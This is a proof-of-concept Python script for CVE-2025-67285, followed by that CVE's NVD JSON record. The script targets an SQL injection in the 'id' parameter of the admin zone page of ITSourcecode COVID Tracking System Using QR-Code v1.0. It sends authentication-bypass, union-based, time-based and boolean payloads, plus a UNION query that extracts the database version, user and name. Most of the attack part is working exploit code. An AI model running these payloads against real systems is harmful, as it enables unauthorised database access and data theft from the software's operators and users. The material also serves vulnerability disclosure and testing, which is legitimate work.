CVE-2025-67285

# CVE-2025-67285 SQL Injection PoC # Target: ITSourcecode COVID Tracking System Using QR-Code v1.0 # Endpoint: /cts/admin/?page=zone # Parameter: id import requests import sys target = "http://target.com/cts/admin/?page=zone" # Basic SQL Injection Test - Boolean Based print("[*] Testing CVE-2025-67285 SQL Injection...") # Normal Request normal_payload = {"id": "1"} response_normal = requests.get(target, params=normal_payload) print(f"[+] Normal Request Status: {response_normal.status_code}") # SQL Injection Payloads payloads = [ "1' OR '1'='1", # Basic Authentication Bypass "1' UNION SELECT 1,2,3--", # Union-based Injection "1' AND SLEEP(5)--", # Time-based Blind Injection "1' AND 1=1--", # Boolean Test - True "1' AND 1=2--", # Boolean Test - False ] for payload in payloads: print(f"\n[*] Testing Payload: {payload}") params = {"id": payload} try: response = requests.get(target, params=params, timeout=10) print(f"[+] Response Length: {len(response.text)}") print(f"[+] Status Code: {response.status_code}") if len(response.text) != len(response_normal.text): print("[!] Potential vulnerability detected!") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") # Database Enumeration Payload (if vulnerable) print("\n[*] Attempting Database Enumeration...") enum_payload = "1' UNION SELECT NULL,version(),user(),database()--" params = {"id": enum_payload} response = requests.get(target, params=params) print(f"[+] Enumeration Response Length: {len(response.text)}") print("\n[*] PoC Complete. Manual verification required.")

{"cve": {"id": "CVE-2025-67285", "sourceIdentifier": "[email protected]", "published": "2025-12-17T17:15:51.137", "lastModified": "2026-01-02T17:46:53.753", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A SQL injection vulnerability was found in the '/cts/admin/?page=zone' file of ITSourcecode COVID Tracking System Using QR-Code v1.0. The reason for this issue is that attackers inject malicious code from the parameter 'id' and use it directly in SQL queries without the need for appropriate cleaning or validation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:angeljudesuarez:covid_tracking_system_using_qr-code:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "22188B0F-745F-4A0C-8D0B-08A042B41067"}]}]}], "references": [{"url": "https://github.com/bardminx/Lonlydance/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}